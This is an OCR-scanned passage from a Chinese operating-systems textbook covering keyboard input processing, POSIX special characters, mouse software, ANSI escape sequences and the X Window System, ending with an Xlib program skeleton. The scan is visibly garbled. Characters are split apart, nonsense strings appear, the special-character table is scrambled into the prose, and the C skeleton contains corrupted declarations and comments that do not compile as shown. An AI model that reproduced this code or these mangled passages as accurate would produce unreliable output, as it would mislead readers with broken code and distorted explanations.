如 果 键 盘 处 于 规范 (加 工 ) 模式 ， 则 字符 必须 存储 起 来 直到 积累 完整 的 一 行 ， 因 为 用 户 随 后 可 能 决 
定 删 除 一 行 中 的 一 部 分 。 即 使 键盘 处 于 原始 模式 ， 程 序 也 可 能 尚未 请 求 输 入 ， 所 以 字符 也 必须 缓冲 起 来 
以 便 人 允许 用 户 提 前 键入 。 可 以 使 用 专用 的 缓冲 区 ， 或 者 缓冲 区 也 可 以 从 池 中 分 配 。 前 者 对 提前 键入 提出 
了 固定 的 限制 ， 后 者 则 没有 。 当 用 户 在 shell 窗 口 (或 Windows 的 命令 行 窗 口 ) 中 击 键 并 且 刚 刚 发 出 一 条 
尚未 完成 的 命令 (例如 编译 ) 时 ， 将 引起 尖锐 的 问题 。 后 继 键 入 的 字符 必须 被 缓冲 ， 因 为 shell 还 没有 准 
备 好 读 它们 。 那 些 不 允许 用 户 提前 键入 的 系统 设计 者 应 该 被 涂 柏油 、 粘 羽毛 2， 或 者 更 加 严重 的 惩罚 是 ， 
强迫 他 们 使 用 他 们 自己 设计 的 系统 。 

虽然 键盘 与 监视 器 在 逻辑 上 是 两 个 独立 的 设备 ， 但 是 很 多 用 户 已 经 习惯 于 看 到 他 们 刚刚 键入 的 字符 
出 现在 屏幕 上 。 这 个 过 程 叫 作 回 显 (echoing), 

当 用 户 正 在 击 键 的 时 候 程 序 可 能 正在 写 屏幕 ， 这 一 事实 使 回 显 变 得 错综复杂 (请 再 一 次 想象 在 shell 
窗口 中 击 键 ) 。 最 起 码 ， 键 盘 驱 动 程 序 必 须 解 决 在 什么 地 方 放置 新 键入 的 字符 而 不 被 程序 的 输出 所 覆盖 。 

当 超过 80 个 字符 必须 在 具有 80 字 符 行 (或 某 个 其 他 数字 ) 的 窗口 中 显示 时 , 也 使 回 显 变 得 错综复杂 。 
根据 应 用 程序 ， 折 行 到 下 一 行 可 能 是 适宜 的 。 某 些 驱动 程序 只 是 通过 丢弃 超出 80 列 的 所 有 字符 而 将 每 行 
截断 到 80 个 字符 。 

另 一 个 问题 是 制 表 符 的 处 理 。 通 常 由 驱动 程序 来 计算 光标 当前 定位 在 什么 位 置 ， 它 既 要 考虑 程序 的 
输出 又 要 考虑 回 显 的 输出 ， 并 且 要 计算 要 回 显 的 正确 的 空格 个 数 。 

现在 我 们 讨论 设备 等 效 性 问题 。 逻 辑 上 ， 在 一 个 文本 行 的 结尾 ， 人 们 需要 一 个 回 车 和 一 个 换行 ， 回 
车 使 光标 移 回 到 第 一 列 ， 换 行使 光标 前 进 到 下 一 行 。 要求 用 户 在 每 一 行 的 结尾 键入 回 车 和 换行 是 不 受 欢 
迎 的 。 这 就 要 求 驱 动 程序 将 输入 转化 成 操作 系统 使 用 的 格式 。 在 UNIX 中 ，ENTER 键 被 转换 成 一 个 换行 
用 于 内 部 存储 ， 而 在 Windows 中 ， 它 被 转换 成 一 个 回 车 跟随 一 个 换行 。 

如 果 标 准 形式 只 是 存储 一 个 换行 《UNIX 约定 )， 那 么 回 车 (由 Enter 键 造成 ) 应 该 转换 为 换行 。 如 
果 内 部 格式 是 存储 两 者 (Windows 约 定 )， 那 么 驱动 程序 应 该 在 得 到 回 车 时 生成 一 个 换行 并 且 在 得 到 换 
行 时 生成 一 个 回 车 。 不 管 是 什么 内 部 约定 ， 监 视 器 可 能 要 求 换行 和 回 车 两 者 都 回 显 ， 以 便 正 确 地 更 新 屏 
幕 。 在 诸如 大 型 计算 机 这 样 的 多 用 户 系统 上 , 不 同 的 用 户 可 能 拥有 不 同类 型 的 终端 连接 到 大 型 计算 机 上 ， 
这 就 要 求 键盘 驱动 程序 将 所 有 不 同 的 回 车 /换行 组 合 转换 成 内 部 系统 标准 并 且 安 排 好 正确 地 实现 回 显 。 


© ”原文 为 be tarred and feathered， 是 英国 古代 的 一 种 酷刑 。 受 刑 人 全 身 涂 上 灼热 的 柏油 (tarred) ， 然 后 将 其 身 
ERTE (feathered) 。 这 样 ， 羽 毛 当 然 很 难 脱 下 ， 要 脱 下 也 难免 皮肉 之 伤 。be tarred and feathered 现 用 
于 比喻 受到 严厉 惩罚 。 一 一 译 者 注 
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在 规范 模式 下 操作 时 , 许多 输入 字符 具有 特殊 的 含义 。 图 5-31 显 示 出 了 POSIX 要 求 的 所 有 特殊 字符 。 
默认 的 是 所 有 控制 字符 ， 这 些 控制 字符 应 












































该 不 与 程序 所 使 用 的 文本 输入 或 代码 相 冲 | 字 符 | POSIX 名 it #F 

突 ， 但 是 除了 最 后 两 个 以 外 所 有 字符 都 可 | CTRL-H | ERASE 退 格 一 个 字符 

以 在 程序 的 控制 下 修改 。 CTRL-U KILL 按 除 正在 键入 的 整 行 
ERASE 字 符 允 许 用 户 删 除 刚刚 键入 的 CTRL-V LNEXT 按 字面 意义 解释 下 一 个 字符 

字符 。 它 通常 是 退 格 符 (CTRL+H)。 它 并 | CTRLS | STOP 停止 输出 

不 添加 到 字符 队列 中 ， 而 是 从 队列 中 删除 — —_ e ee 

AEE CERRARSE TIED CTRL- QUIT 强制 核心 转 储 (SIGQUIT) 

序列 ， 即 退 格 符 、 空 格 和 退 格 符 ， 以 便 从 can = Ta 

屏幕 上 删除 前 一 个 字符 。 如 果 前 一 个 字符 FOREM eR a ta 

是 制 表 符 ， 那 么 删除 它 取决 于 当 它 被 键入 Foe TN E SANE 








的 时 候 是 如 何 处 理 的 。 如 果 制 表 符 直接 展 
开 成 空格 ， 那 么 就 需要 某 些 额外 的 信息 来 图 5-31 在 规范 模式 下 特殊 处 理 的 字符 

决定 后 退 多 远 。 如 果 制 表 符 本 身 被 存放 在 

输入 队列 中 ， 那 么 就 可 以 将 其 删除 并 且 重 新 输出 整 行 。 在 大 多 数 系统 中 ， 退 格 只 删除 当前 行 上 的 字符 ， 
不 会 删除 回 车 并 且 后 退 到 前 一 行 。 

当 用 户 注 意 到 正在 键入 的 一 行 的 开头 有 一 个 错误 时 ， 控 除 一 整 行 并 且 从 头 再 来 常常 比较 方便 。 
KILL 字 符 擦 除 一 整 行 。 大 多 数 系统 使 被 擦 除 的 行 从 屏幕 上 消失 ， 但 是 也 有 少数 古老 的 系统 回 显 该 行 并 
且 加 上 一 个 回 车 和 换行 ， 因 为 有 些 用 户 喜欢 看 到 旧 的 一 行 。 因 此 ， 如 何 回 显 KILL 是 个 人 喜好 问题 。 与 
ERASE 一 样 ，KILL 通 常 也 不 可 能 从 当前 行进 一 步 回 退 。 当 一 个 字符 块 被 删除 时 ， 如 果 使 用 了 缓冲 ， 那 
么 烦 劳 驱动 程序 将 缓冲 区 退还 给 缓冲 地 可 能 值得 做 也 可 能 不 值得 做 。 

有 时 ERASE 或 KILL 字 符 必 须 作为 普通 的 数据 键入 。LNEXT 字 符 用 作 一 个 转 义 字符 (escape character), 
在 UNIX 中 ，CTRL +YVY 是 默认 的 转 义 字符 。 例 如 ， 更 加 古老 的 UNIX 系 统 常常 使 用 @ 作 为 KILL 字 符 ， 但 是 
因特网 邮件 系统 使 用 linda@cs.washington.edu 形 式 的 地 址 。 有 的 人 觉得 老式 的 约定 更 加 舒服 从 而 将 KILL 重 
定义 为 @， 但 是 之 后 又 需要 按 字面 意义 键入 一 个 @ 符 号 到 电子 邮件 地 址 中 。 这 可 以 通过 键入 CTRL+V @ 
来 实现 。CTRL+V 本 身 可 以 通过 键入 CTRL+V CTRL+V 而 按 字面 意义 键入 。 看 到 一 个 CTRL+V 之 后 ， 驱 
动 程序 设置 一 个 标志 ， 表 示 下 一 字符 免除 特殊 处 理 。LNEXT 字 符 本 身 并 不 进入 字符 队列 。 

为 了 让 用 户 阻止 屏幕 图 像 滚动 出 视线 ， 提 供 了 控制 码 以 便 冻 结 屏幕 并 且 之 后 重新 开始 滚动 。 在 
UNIX 系 统 中 ， 这 些 控制 码 分 别 是 STOP (CTRL+S) 和 START (CTRL+Q)。 它 们 并 不 被 存储 ， 只 是 用 
来 设置 或 清除 键盘 数据 结构 中 的 一 个 标志 。 每 当 试图 输出 时 ， 就 检查 这 个 标志 。 如 果 标 志 已 设置 ， 则 不 
输出 。 通 常 ， 回 显 也 随 程序 输出 一 起 被 抑制 。 

杀 死 一 个 正在 被 调试 的 失控 程序 经 常 是 有 必要 的 ，INTR (DEL) 和 QUIT (CTRL+\) 字符 可 以 用 
于 这 一 目的 。 在 UNIX 中 ，DEL 将 SIGINT 信 号 发 送 到 从 该 键盘 启动 的 所 有 进程 。 实 现 DEL 是 相当 需要 技 
巧 的， 因为 UNIX 从 一 开始 就 被 设计 成 在 同一 时 刻 处 理 多 个 用 户 。 因 此 ， 在 一 般 情 况 下 ， 可 能 存在 多 个 
进程 代表 多 个 用 户 在 运行 ， 而 DEL 键 必须 只 能 向 用 户 自己 的 进程 发 信号 。 困 难 之 处 在 于 从 驱动 程序 获得 
信息 送 给 系统 处 理 信 号 的 那 部 分 ， 后 者 毕竟 还 没有 请 求 这 个 信息 。 

CTRL+\ 与 DEL 相 类 似 ， 只 是 它 发 送 的 是 SIGQUIT 信 号 ， 如 果 这 个 信号 没有 被 捕捉 到 或 被 忽略 ， 则 
强迫 进行 核心 转 储 。 当 敲 击 这 些 键 中 的 任意 一 个 键 时 ， 驱 动 程序 应 该 回 显 一 个 回 车 和 换行 并 且 为 了 全 新 
的 开始 而 放弃 累积 的 全 部 输入 。INTR 的 默认 值 经 常 是 CTRL+C 而 不 是 DEL， 因 为 许多 程序 针对 编辑 操 
作 可 互 换 地 使 用 DEL 与 退 格 符 。 

另 一 个 特殊 字符 是 EOF (CTRL+D)。 在 UNIX 中 ， 它 使 任何 一 个 针对 该 终端 的 未 完成 的 读 请 求 以 缓 
神 区 中 可 用 的 任何 字符 来 满足 ， 即 使 缓冲 区 是 空 的 。 在 一 行 的 开头 键入 CTRL+D 将 使 得 程序 读 到 0 个 字 
节 ， 按 惯例 该 字符 被 解释 为 文件 结尾 ， 并 且 使 大 多 数 程序 按照 它们 在 处 理 输入 文件 时 遇 到 文件 结尾 的 同 
样 方法 对 其 进行 处 理 。 
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2. 鼠标 软件 ; 

大 多 数 PC 具有 一 个 鼠标 ， 或 者 具有 一 个 轨迹 球 ， 轨 迹 球 不 过 是 躺 在 其 背部 上 的 鼠标 。 一 种 常见 类 
型 的 鼠标 在 内 部 具有 一 个 橡皮 球 ， 该 橡皮 球 通过 鼠标 底部 的 一 个 圆 洞 突 出 ， 当 鼠标 在 一 个 粗糙 表面 上 移 
动 时 橡皮 球 会 随 着 旋转 。 当 橡皮 球 旋转 时 ， 它 与 放置 在 相互 垂直 的 滚 轴 上 的 两 个 橡皮 滚筒 相 摩擦 。 东 西 
方向 的 运动 导致 平行 于 y 轴 的 滚 轴 旋转 ， 南 北方 向 的 运动 导致 平行 于 x 轴 的 滚 轴 旋 转 。 

另 一 种 流行 的 鼠标 类 型 是 光学 鼠标 ， 它 在 其 底部 装备 有 一 个 或 多 个 发 光 二 极 管 和 光电 探测 器 。 早 期 的 
光学 鼠标 必须 在 特殊 的 鼠标 垫上 操作 ， 鼠 标 垫 上 刻 有 和 矩形 的 网 格 ， 这 样 鼠标 能 够 计数 穿 过 的 线 数 。 现 代 光 
学 鼠标 在 其 中 有 图 像 处 理 芯 片 并 且 获 取 处 于 它们 下 方 的 连续 的 低 分 辩 率 照片 ， 寻 找 从 图 像 到 图 像 的 变化 。 

当 鼠 标 在 随便 哪个 方向 移动 了 一 个 确定 的 最 小 距离 ， 或 者 按钮 被 按 下 或 释放 时 ， 都 会 有 一 条 消息 发 
送 给 计算 机 。 最 小 距离 大 约 是 0.1mm (尽管 它 可 以 在 软件 中 设置 )。 有 些 人 将 这 一 单位 称 为 一 个 鼠标 步 
(mickey) 。 鼠 标 可 能 具有 一 个 、 两 个 或 者 三 个 按钮 ， 这 取决 于 设计 者 对 于 用 户 跟踪 多 个 按钮 的 智力 的 估 
计 。 某 些 鼠 标 具 有 滚轮 ， 可 以 将 额外 的 数据 发 送 回 计 算 机 。 无 线 鼠 标 与 有 线 鼠 标 相 同 ， 区 别 是 无 线 鼠 标 
使 用 低 功 率 无 线 电 ， 例 如 使 用 蓝牙 (Bluetooth) 标准 将 数据 发 送 回 计 算 机 ， 而 有 线 鼠 标 是 通过 导线 将 数 
据 发 送 回 计算 机 。 

发 送 到 计算 机 的 消息 包含 三 个 项 目 :，Ax、Ay、 按 钮 ， 即 自 上 一 次 消息 之 后 x 位 置 的 变化 、 自 上 一 次 
消息 之 后 y 位 置 的 变化 、 按 钮 的 状态 。 消 息 的 格式 取决 于 系统 和 鼠标 所 具有 的 按钮 的 数目 。 通 常 ， 消 息 
占 3 字 节 。 大 多 数 鼠标 返回 报告 最 多 每 秒 40 次 ， 所 以 鼠标 自 上 一 次 报告 之 后 可 能 移动 了 多 个 鼠标 步 。 

注意 ， 鼠 标 仅仅 指出 位 置 上 的 变化 ， 而 不 是 绝对 位 置 本 身 。 如 果 轻 轻 地 拿 起 鼠标 并 且 轻 轻 地 放下 而 
不 导致 橡皮 球 旋转 ， 那 么 就 不 会 有 消息 发 出 。 

许多 GUI 区 分 单 击 与 双击 鼠标 按钮 。 如 果 两 次 点 击 在 空间 上 (鼠标 步 ) 足够 接近 ， 并 且 在 时 间 上 
(毫秒 ) 也 足够 接近 ， 那 么 就 会 发 出 双击 信号 。 最 大 的 “足够 接近 ”是 软件 的 事情 ， 并 且 这 两 个 参数 通 
常 是 用 户 可 设置 的 。 


5.6.2 输出 软件 
下面 我 们 考虑 输出 软件 。 首 先 我 们 将 讨论 到 文本 窗口 的 简单 输出 ,这 是 程序 员 通 常 喜欢 使 用 的 方式 。 
然后 ， 我 们 将 考虑 图 形 用 户 界 面 ， 这 是 其 他 用 户 经 常 喜欢 使 用 的 。 

1. 文本 窗口 

当 输 出 是 连续 的 单一 字体 、 大 小 和 颜色 的 形式 时 ， 输 出 比 输入 简单 。 大 体 上 ， 程 序 将 字符 发 送 到 当 
前 窗口 ， 而 字符 在 那里 显示 出 来 。 通 常 ， 一 个 字符 块 或 者 一 行 是 在 一 个 系统 调用 中 被 写 到 窗口 上 的 。 

屏幕 编辑 器 和 许多 其 他 复杂 的 程序 需要 能 够 以 更 加 复杂 的 方式 更 新 屏幕 ， 例 如 在 屏幕 的 中 间 替 换 
一 行 。 为 满足 这 样 的 需要 ， 大 多 数 输出 驱动 程序 支持 一 系列 命令 来 移动 光标 ， 在 光标 处 插入 或 者 删除 字 
符 或 行 。 这 些 命令 常常 被 称 为 转 义 序列 (escape sequence)。 在 25 行 80 列 ASCII 呈 终端 的 全 盛 期 有数 
百 种 终端 类 型 ， 每 一 种 都 有 自己 的 转 义 序列 。 因 而 ， 编 写 在 一 种 以 上 的 终端 类 型 上 工作 的 软件 是 十 分 困 
难 的 。 

一 种 解决 方案 是 称 为 termcap 的 终端 数据 库 ， 它 是 在 伯克利 UNIX 中 引入 的 。 该 软件 包 定义 了 许多 
基本 动作 ， 例 如 将 光标 移动 到 ( 行 ， 列 ) 。 为 了 将 光标 移动 到 一 个 特殊 的 位 置 ， 软 件 (如 一 个 编辑 器 ) 
使 用 一 个 一 般 的 转 义 序 列 ， 然 后 该 转 义 序列 被 转换 成 将 要 被 执行 写 操作 的 终端 的 实际 转 义 序列 。 以 这 种 
方式 ， 该 编辑 器 就 可 以 工作 在 任何 具有 termcap 数 据 库 人 口 的 终端 上 。 许 多 UNIX 软 件 仍然 以 这 种 方式 工 
作 ， 即 使 在 个 人 计算 机 上 。 

逐渐 地 ， 业 界 看 到 了 转 义 序列 标准 化 的 需要 ， 所 以 就 开发 了 一 个 ANSI 标 准 。 图 5-32 所 示 为 一 些 该 
标准 的 取 值 。 

下 面 考虑 文本 编辑 器 怎样 使 用 这 些 转 义 序列 。 假 设 用 户 键入 了 一 条 命令 指示 编辑 器 完全 删除 第 3 行 ， 
然后 封闭 第 2 行 和 第 4 行 之 间 的 间隙 。 编 辑 器 可 以 通过 串 行 线 向 终端 发 送 如 下 的 转 义 序列 : 

ESC [3;1 H ESC [0 K ESC [1M 


(其 中 在 上 面 使 用 的 空格 只 是 为 了 分 开 符 号 ， 它 们 并 不 传送 )。 这 一 序列 将 光标 移动 到 第 3 行 的 开头 ， 擦 
除 整个 一 行 ， 然 后 删除 现在 的 空 行 ， 使 从 第 4 行 开始 的 所 有 行 向 上 移动 一 行 。 现 在 ， 第 4 行 变 成 了 第 3 行 ， 
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第 5 行 变 成 了 第 4 行 ， 以 此 类 推 。 类 似 的 转 义 序列 可 以 用 来 在 显示 器 的 中 间 添 加 文本 。 字 和 字符 可 以 以 类 
” 似 的 方式 添加 或 删除 。 



























































转 义 序列 含 义 g 
ESC [nA 向 上 移动 m 行 
ESC [nB 向 下 移动 m 行 

| Esc [nc 向 右 移动 "个 间隔 a 

ESC [nD 向 左 移动 个 间隔 
ESC [m; nH 将 光标 移动 到 (m,n) 
ESC [sJ 从 光标 清除 屏幕 (0 到 结尾 、1 从 开始 、2 两 者 ) 
ESC [sK 从 光标 清除 行 (0 到 结尾 、1 从 开始 、2 两 者 ) 
ESC [nL 在 光标 处 插入 n 行 
ESC [nM 在 光标 处 删除 n 行 
ESC [nP 在 光标 处 删除 "个 字符 
ESC [n@ 在 光标 处 插入 n 个 字符 
ESC [nm Farma (0= 常 规 、4= 粗 体 、5= 闪 烁 、7= 反 白 ) 
ESC M 如 果 光 标 在 顶 行 上 则 向 后 滚动 屏幕 





图 5-32 终端 驱动 程序 在 输出 时 接受 的 ANSI 转 义 序列 。ESC 表 示 ASCII 转 义 字符 
(0x1B)，n、m 和 s 是 可 选 的 数值 参数 


2. X 窗 口 系统 

几乎 所 有 UNIX 系 统 的 用 户 界面 都 以 X 窗 口 系 统 (X Window System) 为 基础 ，X 窗 口 系统 经 常 仅 称 
为 X， 它 是 作为 Athena 计 划 人 的 一 部 分 于 20 世 纪 80 年 代 在 MIT 开 发 的 。X 窗 品系 统 具 有 非常 好 的 可 移植 性 ， 
并 且 完 全 运行 在 用 户 空 间 中 。 人 们 最 初 打算 将 其 用 于 将 大 量 的 远程 用 户 终端 与 中 央 计 算 服务 器 相连 接 ， 
所 以 它 在 逻辑 上 分 成 客户 软件 和 主机 软件 ， 这 样 就 有 可 能 运行 在 不 同 的 计算 机 上 。 在 现代 个 人 计算 机 上 ， 
两 部 分 可 以 运行 在 相同 的 机 器 上 。 在 Linux 系 统 上 ， 流 行 的 Gnome 和 KDE 桌 面 环 境 就 运行 在 X 之 上 。 

当 X 在 一 台 机 器 上 运行 时 ， 从 键盘 或 鼠标 采集 输入 并 且 将 输出 写 到 屏幕 上 的 软件 称 为 X 服 务 器 (X 
server) 。 它 必须 跟踪 当前 选择 了 哪个 窗口 (鼠标 指针 所 在 处 )， 这 样 它 就 知道 将 新 的 键盘 输入 发 送 给 哪 
个 客户 。 它 与 称 为 X 客 户 (X client) 的 运行 中 的 程序 进行 通信 (可 能 通过 网 络 ) 。 它 将 键盘 与 鼠标 输入 
发 送 给 X 客 户 ， 并 且 从 X 客 户 接收 显示 命令 。 

X 服 务 器 总 是 位 于 用 户 的 计算 机 内 部 ， 而 X 客 户 有 可 能 在 远方 的 远程 计算 服务 器 上 ， 这 看 起 来 也 许 
有 些 不 可 思议 ， 但 是 X 服 务 器 的 主要 工作 是 在 屏幕 上 显示 位 ， 所 以 让 它 靠 近 用 户 是 有 道理 的 。 从 程序 的 
观点 来 看 ， 它 是 一 个 客户 ， 吟 叭 服务 器 做 事情 ， 例 如 显示 文本 和 几何 图 形 。 服 务 器 (在 本 地 PC 中 ) 只 是 
做 客户 吟 只 它 做 的 事情 ， 就 像 所 有 服务 器 所 做 的 那样 。 

对 于 X 客 户 和 X 服 务 器 在 不 同 机 器 上 的 情形 ， 客 户 与 服务 器 的 布置 如 图 5-33 所 示 。 但 是 当 在 单一 的 
机 器 上 运行 Gnome 或 者 KDE 时 ， 客 户 只 是 使 用 X 库 与 相同 机 器 上 的 X 服 务 器 进行 会 话 的 某 些 应 用 程序 
(但 是 通过 套 接 字 使 用 TCP 连 接 ， 与 远程 情形 中 所 做 的 工作 相同 )。 

在 单机 上 或 者 通过 网 络 在 UNIX (或 其 他 操作 系统 ) 之 上 运行 X 窗 口 系统 都 是 可 行 的 ， 其 原因 在 于 X 
实际 上 定义 的 是 X 客 户 与 X 服 务 器 之 间 的 X 协 议 ， 如 图 5-33 所 示 。 客 户 与 服务 器 是 在 同一 台 机 器 上 ， 还 是 
通过 一 个 局 域 网 隔 开 了 100 米 ， 或 者 是 相距 几 千 公里 并 且 通 过 Internet 相 连接 都 无 关 紧 要 。 在 所 有 这 些 情 
况 下 ,协议 与 系统 操作 都 是 完全 相同 的 。 

X 只 是 一 个 窗口 系统 ， 它 不 是 一 个 完全 的 GUI。 为 了 获得 完全 的 GUI， 要 在 其 上 运行 其 他 软件 层 。 
一 层 是 Xlib ， 它 是 一 组 库 过 程 ， 用 于 访问 X 的 功能 。 这 些 过 程 形 成 了 X 窗 口 系统 的 基础 ， 我 们 将 在 下 面 
对 其 进行 分 析 ， 但 是 这 些 过 程 过 于 原始 了 ， 以 至 于 大 多 数 用 户 程序 不 能 直接 访问 它们 。 例 如 ， 每 次 鼠标 
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点 击 是 单独 报告 的 ， 所 以 确定 两 次 点 击 实际 上 形成 了 双击 必须 在 Xlib 之 上 处 理 。 

为 了 使 得 对 X 的 编程 更 加 容易 ,作为 X 的 一 部 分 提供 了 一 个 工具 包 , 组 成 了 Intrinsics (本 征 函 数 集 )。 
这 一 层 管理 按钮 、 滚 动 条 以 及 其 他 称 为 窗口 小 部 件 (widget) 的 GUI 元 素 。 为 了 产生 真正 的 GUI 界面 ， 
具有 一 致 的 外 观 与 感觉 ， 还 需要 另外 一 层 软件 (或 者 几 层 软件 )。 一 个 例子 是 Motif， 如 图 5-33 所 示 ， 它 
是 Solaris 和 其 他 商业 UNIX 系 统 上 使 用 的 公共 桌面 环境 (Common Desktop Environment) 的 基础 。 大 多 
数 应 用 程序 利用 的 是 对 Motif 的 调用 ， 而 不 是 对 Xlib 的 调用 。Gnome 和 KDE 具 有 与 图 5-33 相 类 似 的 结构 ， 
只 是 库 有 所 不 同 。Gnome 使 用 GTK+ 库 ，KDE 使 用 Qt 库 。 拥 有 两 个 GUI 是 否 比 一 个 好 是 有 争议 的 。 
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图 5-33 MIT X 窗 口 系统 中 的 客户 与 服务 器 


此 外 ， 值 得 注意 的 是 窗口 管理 并 不 是 X 本 身 的 组 成 部 分 。 将 其 遗漏 的 决策 完全 是 故意 的 。 一 个 单独 
的 客户 进程 ， 称 为 窗口 管理 器 (window manager) ， 控 制 着 屏幕 上 窗口 的 创建 、 删 除 以 及 移动 。 为 了 管 
理 窗口 ， 窗 口 管理 器 要 发 送 命令 到 X 服 务 器 告诉 它 做 什么 。 窗 口 管理 器 经 常 运行 在 与 X 客 户 相 同 的 机 器 
上 ， 但 是 理论 上 它 可 以 运行 在 任何 地 方 。 

这 一 模块 化 设计 ， 包 括 若 干 层 和 多 个 程序 ， 使 得 X 高 度 可 移植 和 高 度 灵活 。 它 已 经 被 移植 到 UNIX 的 大 
多 数 版 本 上 ， 包 括 Solaris、BSD 的 所 有 派生 版 本 、AIX、Linux 等 ， 这 就 使 得 对 于 应 用 程序 开发 人 员 来 说 在 
多 种 平台 上 拥有 标准 的 用 户 界面 成 为 可 能 。 它 还 被 移植 到 其 他 操作 系统 上 。 相 反 ， 在 Windows 中 ， 窗 口 与 
GUI 系统 在 GDI 中 混合 在 一 起 并 且 处 于 内 核 之 中 ， 这 使 得 它们 维护 起 来 十 分 困难 ， 并 且 当 然 是 不 可 移植 的 。 

现在 让 我 们 像 是 从 Xlib 层 观察 那样 来 简略 地 看 一 看 X。 当 一 个 X 程 序 启动 时 ， 它 打开 一 个 到 一 个 或 
多 个 X 服 务 器 (我 们 称 它们 为 工作 站 ) 的 连接 ， 即 使 它们 可 能 与 X 程 序 在 同一 台 机 器 上 。 在 消息 丢失 与 
重复 由 网 络 软件 来 处 理 的 意义 上 ，X 认 为 这 一 连接 是 可 靠 的 ， 并 且 它 不 用 担心 通信 错误 。 通 常 在 服务 器 
与 客户 之 间 使 用 的 是 TCP/IP。 

四 种 类 型 的 消息 通过 连接 传递 : 

1) 从 程序 到 工作 站 的 绘图 命令 。 

2) 工作 站 对 程序 请 求 的 应 答 。 

3) 键盘 、 鼠 标 以 及 其 他 事件 的 通告 。 

4) 错误 消息 。 

从 程序 到 工作 站 的 大 多 数 绘图 命令 是 作为 单 向 消息 发 送 的， 不 期 望 应 答 。 这 样 设计 的 原因 是 当 客 户 与 
服务 器 进程 在 不 同 的 机 器 上 时 ， 命 令 到 达 服 务 器 并 且 执 行 要 花费 相当 长 的 时 间 周期 。 在 这 一 时 间 内 阻塞 应 用 
程序 将 不 必要 地 降低 其 执行 速度 。 另 一 方面 ， 当 程序 需要 来 自 工 作 站 的 信息 时 ， 它 只 好 等 待 直到 应 答 返回 。 

与 Windows 类 似 ，X 是 高 度 事件 驱动 的 。 事 件 从 工作 站 流向 程序 ， 通 当 是 为 响应 人 的 某 些 行动 ， 例 
如 键盘 敲 击 、 鼠 标 移动 或 者 一 个 窗口 被 显现 。 每 个 事件 消息 32 个 字 节 ， 第 一 个 字 节 给 出 事件 类 型 ， 下 面 
的 31 个 字 节 提供 附加 的 信息 。 存 在 许多 种 类 的 事件 ， 但 是 发 送 给 一 个 程序 的 只 有 那些 它 宣称 愿意 处 理 的 
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事件 。 例 如 ， 如 果 一 个 程序 不 想 得 知 键 释 放 的 消息 ， 那 么 键 释 放 的 任何 事件 都 不 会 发 送 给 它 。 与 在 
Windows 中 一 样 ， 事 件 是 排 成 队列 的 ， 程 序 从 队列 中 读 取 事件 。 然 而 ， 与 Windows 不 同 的 是 ， 操 作 系统 
绝对 不 会 主动 调用 在 应 用 程序 之 内 的 过 程 ， 它 甚至 不 知道 哪个 过 程 处 理 哪个 事件 。 

X 中 的 一 个 关键 概念 是 资源 (resource)。 资 源 是 一 个 保存 一 定 信息 的 数据 结构 。 应 用 程序 在 工作 站 
上 创建 资源 。 在 工作 站 上 ， 资 源 可 以 在 多 个 进程 之 间 共 享 。 资 源 的 存活 期 往往 很 短 ， 并 且 当 工作 站 重新 
启动 后 资源 不 会 继续 存在 。 典 型 的 资源 包括 窗口 、 字 体 、 颜 色 映射 〈 调 色 板 ) 、 像 素 映射 〈 位 图 )、 光 标 
以 及 图 形 上 下 文 。 图 形 上 下 文 用 于 将 属性 与 窗口 关联 起 来 ， 在 概念 上 与 Windows 的 设备 上 下 文 相 类 似 。 

X 程 序 的 一 个 粗略 的 、 不 完全 的 框架 如 图 5-34 所 示 。 它 以 包含 某 些 必需 的 头 文件 开始 ， 之 后 声明 某 
些 变量 。 然 后 ， 它 与 X 服 务 器 连接 ，X 服 务 器 是 作为 XOpenDisplay 的 参数 设 定 的。 接着 ， 它 分 配 一 个 窗 
口 资 源 并 且 将 指向 该 窗口 资源 的 句柄 存放 在 win 中 。 实 际 上 ， 一 些 初 始 化 应 该 出 现在 这 里 ， 在 初始 化 之 
后 X 程 序 通知 窗口 管理 器 新 窗口 的 存在 ， 因 而 窗口 管理 器 能 够 管理 它 。 


#include <X11/Xlib.h> 
#include <X11/Xutil.h> 


main(int argc, char *argv[]) 
{ 


Display disp; /* 服务 器 标识 符 */ 
Wae win; /* 窗口 标识 符 #/ 

C; A = * 
XEvent event; N MEE TEER 


int running = 1; + 用 于 存储 一 个 事件 */ 


disp = XOpenDisplay("display_name"); /* 连接 到 X 服 务 器 */ 

win = XCreateSimpleWindow(disp，.… ); /* 为 新 窗口 分 配 内 存 */ 
XSetStandardProperties(disp, ...); /* 向 窗口 管理 器 宣布 窗口 */ 

gc = XCreateGC(disp, win, 0, 0); /* 创建 图 形 上 下 文 */ 
XSelectinput(disp, win, ButtonPressMask | KeyPressMask | ExposureMask); 
XMapRaised(disp, win); /* 显示 窗口 ， 发 送 Expose 事 件 */ 


while (running) { 
XNextEvent(disp, &event);  /* 获得 下 一 个 事件 */ 
switch (event.type) { 
case Expose: -) break; /* 重 绘 窗口 */ 
case ButtonPress: ...; break; /* 处 理 鼠 标点 击 */ 
case Keypress: „i break; /* 处 理 键盘 输入 */ 
} 
} 


XFreeGC(disp, gc); * 释放 图 形 上 下 文 sal 
XDestroyWindow(disp, win); /* 回收 窗口 的 内 存 空间 */ 
XCloseDisplay(disp); /* tie El AE BE */ 





图 5-34 X 窗 口 应 用 程序 的 框架 


对 XCreateGC 的 调用 创建 一 个 图 形 上 下 文 ， 窗 口 的 属性 就 存放 在 图 形 上 下 文中 。 在 一 个 更 加 复杂 的 
程序 中 ,窗口 的 属性 应 该 在 这 里 被 初始 化 。 下 一 条 语句 对 XSelectInput 的 调用 通知 X 服 务 器 程序 准备 处 理 
哪些 事件 ， 在 本 例 中 ， 程 序 对 鼠标 点 击 、 键 盘 敲 击 以 及 窗口 被 显现 感 兴趣 。 实 际 上 ， 一 个 真正 的 程序 还 
会 对 其 他 事件 感 兴趣 。 最 后 ， 对 XMapRaised 的 调用 将 新 窗口 作为 最 顶层 的 窗口 映射 到 屏幕 上 。 此 时 ， 
窗口 在 屏幕 上 成 为 可 见 的 。 

主 循环 由 两 条 语句 构成 ， 并 且 在 逻辑 上 比 Windows 中 对 应 的 循环 要 简单 得 多 。 此 处 ， 第 一 条 语句 获 
得 一 个 事件 ， 第 二 条 语句 对 事件 类 型 进行 分 派 从 而 进行 处 理 。 当 某 个 事件 表明 程序 已 经 结束 的 时 候 ， 
running 被 设置 为 0， 循 环 结束 。 在 退出 之 前 ， 程 序 释放 了 图 形 上 下 文 、 窗 口 和 连接 。 

